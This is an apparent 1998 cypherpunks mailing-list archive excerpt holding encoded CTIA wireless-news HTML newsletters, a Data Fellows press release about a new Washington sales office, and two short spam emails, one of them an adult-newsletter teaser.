IElJSSh0bSkgb3JnYW5pemVyCnVzZXJzLiZuYnNwOyAoPEEgSFJFRj0iaHR0
cDovL2Jpei55YWhvby5jb20vYncvOTgwOTIxL2pwX3N5c3RlbXNfMS5odG1s
Ij5ZQUhPTzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVs
dmV0aWNhIj48Rk9OVCBTSVpFPSsxPkNoaWVmIG9mIFN0YWZmIEF0IFRoZQpG
Q0MgUmVzaWduczwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj5Kb2huIE5ha2FoYXRhIGFubm91bmNlZCBoaXMgcmVzaWdu
YXRpb24sCmVmZmVjdGl2ZSBPY3RvYmVyIDMxLCAxOTk4LCBhcyBhIGRlY2lz
aW9uIGZvciBmYW1pbHkgcmVhc29ucy4mbmJzcDsgKDxBIEhSRUY9Imh0dHA6
Ly93d3cuY25uZm4uY29tL2RpZ2l0YWxqYW0vOTgwOS8yMS9mY2MvIj5DTk5G
TjwvQT4pCig8QSBIUkVGPSJodHRwOi8vY2hpY2Fnb3RyaWJ1bmUuY29tL2J1
c2luZXNzL2J1c2luZXNzbmV3cy9hcnRpY2xlLzAsMTA1MSxTQVYtOTgwOTIy
MDMxMCwwMC5odG1sIj5DSElDQUdPClRSSUJVTkU8L0E+KTwvRk9OVD48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPgo8SFIg
V0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9O
VCBTSVpFPS0xPkZvciBhZGRpdGlvbmFsIG5ld3MgYWJvdXQKdGhlIHdpcmVs
ZXNzIGluZHVzdHJ5LS1pbmNsdWRpbmcgcGVyaW9kaWMgbmV3cyB1cGRhdGVz
IHRocm91Z2hvdXQgdGhlIGRheS0tdmlzaXQKPEEgSFJFRj0iaHR0cDovL3d3
dy53b3ctY29tLmNvbSI+aHR0cDovL3d3dy53b3ctY29tLmNvbS48L0E+PC9G
T05UPjwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPgo8SFIgV0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPkNUSUEgRGFpbHkgTmV3cyBmcm9t
IFdPVy1DT00KaXMgdHJhbnNtaXR0ZWQgd2Vla2RheXMsIGV4Y2VwdCBmb3Ig
aG9saWRheXMuIFZpc2l0IHVzIG9uIHRoZSBXb3JsZCBXaWRlCldlYiBhdCA8
QSBIUkVGPSJodHRwOi8vd3d3Lndvdy1jb20uY29tL3Byb2Zlc3Npb25hbCI+
aHR0cDovL3d3dy53b3ctY29tLmNvbS9wcm9mZXNzaW9uYWw8L0E+LiZuYnNw
OzwvRk9OVD48L0ZPTlQ+Jm5ic3A7Cgo8UD48Rk9OVCBGQUNFPSJBcmlhbCxI
ZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+SWYgeW91IGFyZSBub3QgaW50ZXJl
c3RlZAppbiByZWNlaXZpbmcgdGhlIENUSUEgRGFpbHkgTmV3cyBmcm9tIFdP
Vy1DT00sIHBsZWFzZSBzZW5kIGEgbWVzc2FnZSB0bwo8QSBIUkVGPSJtYWls
dG86dW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1bTIudW5pdHltYWlsLmNvbSI+
dW5qb2luLUNUSUFfRGFpbHlfTmV3c0B1bTIudW5pdHltYWlsLmNvbTwvQT4u
Jm5ic3A7PC9GT05UPjwvRk9OVD4mbmJzcDsKCjxQPjxCPioqKjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT4gVGhlIHRlcm0g
InVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVuaXR5bWFpbC5jb20iCm11
c3QgYmUgbGlzdGVkIGluIHRoZSBUTyBzZWN0aW9uIG9mIHRoZSBlbWFpbC48
L0ZPTlQ+PC9GT05UPiAqKio8L0I+Jm5ic3A7Cgo8UD48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9LTE+UGxlYXNlIE5vdGU6IFNv
bWUgb2YgdGhlCmxpbmtzIGluIHRvZGF5J3MgbmV3cyBhcmUgdGltZSBzZW5z
aXRpdmUuJm5ic3A7IFRob3NlIGxpbmtzIG1heSBub3QgYmUKYXZhaWxhYmxl
IGFzIG5ld3MgY2hhbmdlcyB0aHJvdWdob3V0IHRoZSBkYXkuJm5ic3A7IEFs
c28sIHNvbWUgbmV3cyBzb3VyY2VzCm1heSBiZSBzdWJzY3JpcHRpb24tYmFz
ZWQgb3IgcmVxdWlyZSByZWdpc3RyYXRpb24uPC9GT05UPjwvRk9OVD48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPgo8SFIg
V0lEVEg9IjEwMCUiPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KPC9UQUJMRT48
L0NFTlRFUj4KCjxDRU5URVI+Jm5ic3A7PC9DRU5URVI+Cgo8L0JPRFk+Cjwv
SFRNTD4K
--Boundary..3996.1071713805.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marita Nsman-Repo <Marita.Nasman-Repo@DataFellows.com>
Date: Tue, 22 Sep 1998 07:04:15 -0700 (PDT)
To: F-Secure-Press-Global@DataFellows.com
Subject: MEDIA RELEASE! Washington DC office opened
Message-ID: <3.0.32.19980922135655.009c0580@smtp.datafellows.com>
MIME-Version: 1.0
Content-Type: text/plain







The following press release for your information. 

Regards

Marita Nasman-Repo

#############################################

Data Fellows Opens Regional Sales Office in Washington, D.C.



	Helsinki, Finland, September 21, 1998 -- Data Fellows, the leading
developer of data security solutions, announces the opening of a regional
sales office in Washington, D.C.  The new office is located to better serve
Data Fellows' current and future clients in the federal government and in
the Eastern portion of the United States.


	Data Fellows is no stranger to the Washington area.  The company's client
base includes the Federal Reserve Bank, the Internal Revenue Service, the
Department of Defense, NASA, and other government agencies.  The new office
is the first of several planned regional offices designed to further
enhance the company's relations with its North American customer base.


	Technology industry veteran Joe Arcade has been appointed the sales
director for the new Washington office.  Mr Arcade has been involved in
Washington-area technology for the past 15 years and has held executive
positions with companies including Unisys, British Telecom, Sun
Microsystems, Cabletron and Litton.  Mr. Arcade has a Bachelors degree from
Youngstown State University and a Masters degree from Catholic University.


	With offices in San Jose, CA, and Helsinki, Finland, privately-owned Data
Fellows is the leading technology provider of data security solutions for
computer networks and desktop computers.  The company's F-Secure data
security product line includes F-Secure Workstation Suite, consisting of
malicious code detection and removal, unobtrusive file and network
encryption, and personal firewall functionality, all integrated into a
policy-based management architecture; F-Secure Anti-Virus, with multiple
scanning engines (including F-PROT and AVP), is the most comprehensive,
real-time virus scanning and protection system for all Windows platforms;
F-Secure VPN+ provides a software-based, IPSEC-compliant Virtual Private
Network solution for large corporate networks as well as remote and small
office networks;  F-Secure FileCrypto is the first and only product to
integrate strong real-time encryption directly into the Windows file
system; FSecure SSH provides secure remote login, terminal, and other
connections over unsecured networks. It is the most widely used secure
remote administration tool; and F-Secure NameSurfer is the solution for
remote Internet and Intranet DNS administration.  Its easy-to-use WWW user
interface automates and simplifies DNS administration. The company's
products are relied on by many of the world's largest companies,
governments, universities and institutions. The products are available
worldwide in more than 100 countries through Data Fellows and its business
partners, and the company has experienced 100% annual growth during each of
the past three years.


	For more information, contact Data Fellows, 675 North First Street, 8th
floor, San Jose, CA 95112; tel 408-938-6700; fax 408-938-6701; 
http://www.DataFellows.com   or  info@DataFellows.com.

######################################



 

--
Marita.Nasman-Repo@DataFellows.com, 
World-Wide Web http://www.DataFellows.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jal@jb.com
Date: Tue, 22 Sep 1998 15:53:53 -0700 (PDT)
To: jal@jb.com
Subject: Child Bicycle Safety Site
Message-ID: <199809222253.PAA01245@ias.jb.com>
MIME-Version: 1.0
Content-Type: text/plain


Word has it that you ride a bicycle - 
and that's why you've received this piece of email.
---------  

You should visit this site if you ride a bike AND have a child:

http://www.springfield-or.com/familytrends

Tell someone else who rides with a child what you've seen.

---------
If you wish to be removed from future mailings, please reply with the word
"Remove" in the subject line.  Thank you.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Wed, 23 Sep 1998 11:01:46 -0700 (PDT)
To: (STUFFED WEDNESDAY SEPTEMBER 23 1998)
Subject: TODAY'S NEWS AND PICS PACKED STUFFED! - READ IT NOW!
Message-ID: <19980923071001.10591.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


+ GRAND JURY TESTIMONY
+ YOUR OWN PRIVATE PORN STAR
+ MISTRESS OF MEASURMENT
+ INTERVIEW FOR INTERCOURSE
+ SEXUAL HEALING- THE UPS AND DOWNS
+ LEAH REMINI GETS TOUCHED
+ SEX ON THE BUS
+ THE BEST OF EUREKA

       ---->   http://stuffed.net/98/9/23/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/23/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Wed, 23 Sep 1998 10:44:58 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - September 23, 1998
Message-ID: <199809231737.MAA03879@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3996.1071713805.multipart/mixed"

--Boundary..3996.1071713805.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

The Newest Most Comprehensive Tradeshow of Wireless
Computing and Communications is Less Than a Month Away.
Register TODAY!
http://www.wirelessit.com/register.htm 

Team WOW-COM
wowcom@ctia.org
===========================================
 




--Boundary..3996.1071713805.multipart/mixed
Content-Type: application/octet-stream; name="bin00023.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00023.bin"
Content-Description: "_CTIA_Daily_News_19980923.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOwo8QlI+Jm5ic3A7CjxDRU5URVI+PFRB
QkxFIEJPUkRFUj0wIENPTFM9MiBXSURUSD0iNjAwIiA+CjxUUj4KPFREPjxB
IEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20iPjxJTUcgU1JDPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tL2ltYWdlcy9ob21laGVkX3Rlc3QuZ2lmIiBB
TFQ9IldPVy1DT00uQ09NIiBOT1NBVkUgQk9SREVSPTAgSEVJR0hUPTg5IFdJ
RFRIPTI3NT48L0E+PC9URD4KCjxURD4KPENFTlRFUj48QSBIUkVGPSJodHRw
Oi8vd3d3LmlsbHVtaW5ldFNTNy5jb20vd2lyZWxlc3Mvd2ludW1wb3IuaHRt
Ij48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9pbWFnZXMvYWRz
L2lsbHVtaW5ldF9udW1wb3J0LmdpZiIgQUxUPSJUb2RheSdzIE5ld3MgU3Bv
bnNvcmVkIGJ5IElsbHVtaW5ldCIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD03
NSBXSURUSD0xNzUgQUxJR049QUJTQk9UVE9NPjwvQT48L0NFTlRFUj4KPC9U
RD4KPC9UUj4KPC9UQUJMRT48L0NFTlRFUj4KCjxDRU5URVI+Jm5ic3A7PC9D
RU5URVI+Cgo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9MCBXSURUSD0iNjAwIiA+
CjxUUiBCR0NPTE9SPSIjMDAwMDk5Ij4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBDT0xPUj0iI0NDQ0ND
QyI+PEZPTlQgU0laRT0rMT5DVElBCkRhaWx5IE5ld3MgZnJvbSBXT1ctQ09N
IC0gU2VwdGVtYmVyIDIzLCAxOTk4PC9GT05UPjwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
CjxIUiBXSURUSD0iNTgwIj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+PEZPTlQgU0laRT0rMT5SZXZpZXcgT2YgMTk5NiBUZWxlY29tbXVuaWNh
dGlvbnMKQWN0IExpa2VseSBJbiBFYXJseSAxOTk5PC9GT05UPjwvRk9OVD48
L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxU
RD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkFuIGluY3JlYXNlIGlu
IHN1cHBvcnQgb2YgcmV2aWV3aW5nIHRoZQpUZWxlY29tIEFjdCBhbmQgaW5j
cmVhc2luZyBjb21wZXRpdGlvbiBpbiB0aGUgbG9jYWwgcGhvbmUgbWFya2V0
IG1heSBsZWFkCnRvIGhlYXJpbmcgcmV2aWV3cyBpbiBlYXJseSAxOTk5LiZu
YnNwOyAoPEEgSFJFRj0iaHR0cDovL3d3dy50ZWNod2ViLmNvbS93aXJlL3N0
b3J5L1RXQjE5OTgwOTIyUzAwMTAiPlRFQ0hXRUI8L0E+KTwvRk9OVD48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxicj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxC
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5D
VElBICZhbXA7IENFTUEgUGFydG5lcgpUbyBDcmVhdGUgV2lyZWxlc3MgQ29u
ZmVyZW5jZSBFdmVudCBBdCAxOTk5IElOVEVSTkFUSU9OQUwgQ0VTJm5ic3A7
PC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PlRoZSBDZWxsdWxhciBUZWxlY29tbXVuaWNhdGlvbnMgSW5kdXN0cnkKQXNz
b2NpYXRpb24gKENUSUEpIGFuZCB0aGUgQ29uc3VtZXIgRWxlY3Ryb25pY3Mg
TWFudWZhY3R1cmVycyBBc3NvY2lhdGlvbgooQ0VNQSkgYW5ub3VuY2VkIHRo
ZWlyIGpvaW50IHBhcnRuZXJzaGlwIHRvIHByb2R1Y2UgYSBjb21wcmVoZW5z
aXZlIHdpcmVsZXNzCmNvbmZlcmVuY2UgZXZlbnQgZHVyaW5nIHRoZSAxOTk5
IEludGVybmF0aW9uYWwgQ0VTIC0gVGhlIFNvdXJjZSBmb3IgQ29uc3VtZXIK
VGVjaG5vbG9naWVzLCBpbiBMYXMgVmVnYXMsIE5ldi4sIEphbnVhcnkgNy0x
MCwgMTk5OS4mbmJzcDsgKDxBIEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5j
b20vcmVzdWx0cy9wcm9mZXNzaW9uYWwvbmV3cy9mcmFtZWluZGV4LmNmbT9h
cnRpY2xlaWQ9MzQ1MSI+V09XLUNPTTwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PGJyPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQg
RkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPlFVQUxDT01N
IEludHJvZHVjZXMgTmV3CkhpZ2gtU3BlZWQgV2lyZWxlc3MgQ29ubmVjdGlv
bjwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNh
Ij5RVUFMQ09NTSB3aWxsIGFubm91bmNlIGl0cyBuZXcgaGlnaC1kYXRhLXJh
dGUKZGlnaXRhbCB0ZWNobm9sb2d5IHRoYXQgY2FuIHRyYW5zbWl0IGRhdGEg
YXQgc3BlZWRzIG9mIDEuNSBtZWdhYml0cyBwZXIKc2Vjb25kIC0gZml2ZSB0
aW1lcyB0aGUgc3RhbmRhcmQgaG9tZSBtb2RlbS4mbmJzcDsmbmJzcDsgKDxB
IEhSRUY9Imh0dHA6Ly93d3cubGF0aW1lcy5jb20vSE9NRS9ORVdTL0JVU0lO
RVNTL3QwMDAwODY0NTcuMS5odG1sIj5MQVRJTUVTPC9BPikKKDxBIEhSRUY9
Imh0dHA6Ly93d3cubWVyY3VyeWNlbnRlci5jb20vcHJlbWl1bS9idXNpbmVz
cy9kb2NzL3dpcmVsZXNzMjMuaHRtIj5NRVJDVVJZCkNUUjwvQT4pPC9GT05U
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PGJyPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpF
PSsxPldpcmVsZXNzIFRlY2hub2xvZ3kgSm9pbnMKRm9yY2VzIFdpdGggUG9s
aWNlIERlcGFydG1lbnRzPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPlRlbGVjb21tdW5pY2F0aW9uIGZpcm1zIHN1Y2gg
YXMgR1RFIGFuZApTaWVycmEgV2lyZWxlc3Mgd2lsbCBiZW5lZml0IGZyb20g
dGhlIG5hdGlvbndpZGUgbmVlZCBmb3Igd2lyZWxlc3MgdGVjaG5vbG9neQpp
biB0aGUgcG9saWNlIGZvcmNlLiZuYnNwOyAoPEEgSFJFRj0iaHR0cDovL3d3
dy53YXNoaW5ndG9udGVjaG5vbG9neS5jb20vc3RhdGVfbG9jYWwvcG9saWNl
X2xpbmsuaHRtbCI+V0FTSFRFQ0g8L0E+KTwvRk9OVD48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxicj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5MdWNlbnQgSW52
ZXN0aWdhdGVzIFdpdGhpbgpUbyBFbmQgQWNjdXNhdGlvbnMgb2YgU2Fib3Rh
Z2U8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+QW4gaW50ZXJuYWwgaW52ZXN0aWdhdGlvbiBhdCBMdWNlbnQgVGVjaG5v
bG9naWVzCnJlc3VsdGVkIGluIG5vIGV2aWRlbmNlIHRoYXQgYSBMdWNlbnQg
ZW1wbG95ZWUgc2VudCBhbiBlLW1haWwgYWNjdXNpbmcKQ2llbmEgb2YgZmFs
c2lmeWluZyB0ZXN0IHJlc3VsdHMuJm5ic3A7IEx1Y2VudCB3YXMgYmxhbWVk
IGJ5IENpZW5hIGZvcgppdHMgZmFpbGVkIG1lcmdlciB3aXRoIFRlbGxhYnMu
ICg8QSBIUkVGPSJodHRwOi8vd3d3Lndhc2hpbmd0b25wb3N0LmNvbS93cC1z
cnYvd2FzaHRlY2gvbG9uZ3Rlcm0vY2llbmEvY2llbmEuaHRtIj5XQVNIUE9T
VDwvQT4pCig8QSBIUkVGPSJodHRwOi8vaW50ZXJhY3RpdmUud3NqLmNvbS9h
cnRpY2xlcy9TQjkwNjUwNjUyOTQzNjE2MjUwMC5odG0iPldTSjwvQT4pPC9G
T05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PGJyPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPSsxPkNvbW1lbnRzIG9uIFBvc3NpYmxlCkFjcXVpc2l0aW9uIG9mIENp
ZW5hIGJ5IENpc2NvIFN5c3RlbXMgRGVuaWVkJm5ic3A7PC9GT05UPjwvRk9O
VD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkNpc2NvIFN5c3Rl
bXMgaGFzIGRlY2xpbmVkIHRvIG1ha2UgYW55CmNvbW1lbnRzIG9uIHJ1bW9y
cyB0aGF0IHRoZXkgYXJlIGNvbnNpZGVyaW5nIGFuIGFjcXVpc2l0aW9uIG9m
IENpZW5hIENvcnBvcmF0aW9uLgooPEEgSFJFRj0iaHR0cDovL3d3dy51c2F0
b2RheS5jb20vbW9uZXkvbWRzMi5odG0iPlVTQVRPREFZPC9BPikgKDxBIEhS
RUY9Imh0dHA6Ly9iaXoueWFob28uY29tL3JmLzk4MDkyMi9iZ3UuaHRtbCI+
WUFIT088L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxicj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8
VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+PEZPTlQgU0laRT0rMT5HbG9iYWxTdGFyIFdvcmtzIFRvIFJlY292
ZXIKPkZyb20gRmFpbGVkIExhdW5jaDwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+
Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQg
RkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5EZXNwaXRlIHRoZSBsb3NzIG9mIHR3
ZWx2ZSBzYXRlbGxpdGVzCmF0IGEgZmFpbGVkIFJ1c3NpYW4gbGF1bmNoLCBH
bG9iYWxTdGFyIGhhcyByZXZpc2VkIGlzIHBsYW4gd2l0aCBhbiBhbnRpY2lw
YXRlZAphZGRpdGlvbmFsIGNvc3Qgb2YgJDI0MCBNaWxsaW9uLiAoPEEgSFJF
Rj0iaHR0cDovL3d3dy5hYmNuZXdzLmNvbS9zZWN0aW9ucy90ZWNoL0RhaWx5
TmV3cy9nbG9iYWxzdGFyOTgwOTIyLmh0bWwiPkFCQ05FV1M8L0E+KQooPEEg
SFJFRj0iaHR0cDovL3d3dy53aXJlZC5jb20vbmV3cy9uZXdzL2J1c2luZXNz
L3N0b3J5LzE1MTUyLmh0bWwiPldJUkVEPC9BPikKKDxBIEhSRUY9Imh0dHA6
Ly9pbnRlcmFjdGl2ZS53c2ouY29tL2FydGljbGVzL1NCOTA2NTEzNzI3NTQ5
Mzk5MDAwLmh0bSI+V0FTSFBPU1Q8L0E+KTwvRk9OVD48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxicj48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZB
Q0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5BbWVyaXRlY2gg
SW50cm9kdWNlcwpQcml2YWN5IE1hbmFnZXIgU2VydmljZTwvRk9OVD48L0ZP
TlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5OZXcgc2Vydmlj
ZSBhbGxvd3MgY3VzdG9tZXJzIHRvIGF1dG9tYXRpY2FsbHkKcmVqZWN0IHVu
d2FudGVkIHBob25lIHNvbGljaXRhdGlvbnMuICg8QSBIUkVGPSJodHRwOi8v
d3d3LnVzYXRvZGF5LmNvbS9tb25leS9tZHM4Lmh0bSI+VVNBVE9EQVk8L0E+
KQooPEEgSFJFRj0iaHR0cDovL2NoaWNhZ290cmlidW5lLmNvbS9idXNpbmVz
cy9idXNpbmVzc25ld3MvYXJ0aWNsZS8wLDEwNTEsQVJULTE1Mjk0LDAwLmh0
bWwiPkNISUNBR08KVFJJQlVORTwvQT4pICg8QSBIUkVGPSJodHRwOi8vd3d3
Lndhc2h0aW1lcy5jb20vYnVzaW5lc3MvYnVzaW5lc3MyLmh0bWwiPldBU0hU
SU1FUzwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4K
PFREPjwvVEQ+Cgo8VEQ+PGJyPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxU
Uj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0
aWNhIj48Rk9OVCBTSVpFPSsxPkRlY2lzaW9uIEluIEZhaXJmYXggQ291bnR5
J3MKQ2VsbHVsYXIgVG93ZXJzIFN1aXQ8L0ZPTlQ+PC9GT05UPjwvQj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+Q2lyY3VpdCBDb3VydCBKdWRnZSBy
dWxlcyB0aGF0IGNlbGx1bGFyCnRvd2VycyBidWlsdCBvbiBzdGF0ZS1vd25l
ZCBwcm9wZXJ0eSBjYW5ub3QgYmUgcmVndWxhdGVkIGJ5IHRoZSBjb3VudHku
Cig8QSBIUkVGPSJodHRwOi8vd3d3Lndhc2hpbmd0b25wb3N0LmNvbS93cC1z
cnYvZGlnZXN0L3RlY2gyLmh0bSI+V0FTSFBPU1Q8L0E+KTwvRk9OVD48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxicj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxC
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5U
YWtpbmcgVGhlIE1vYmlsZSBPZmZpY2UKT25lIFN0ZXAgRnVydGhlcjwvRk9O
VD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5NaWxs
aW9ucyBvZiBBbWVyaWNhbnMgd29yayBmcm9tIHRoZWlyCmNhciBhbmQgZm9y
IG1hbnkgb2YgdGhlbSwgYSBjZWxsIHBob25lIHBsdWdnZWQgaW50byB0aGUg
Y2lnYXJldHRlIGxpZ2h0ZXIKaXMgYmFzaWMgZXF1aXBtZW50LiAoPEEgSFJF
Rj0iaHR0cDovL2ludGVyYWN0aXZlLndzai5jb20vYXJ0aWNsZXMvU0I5MDY1
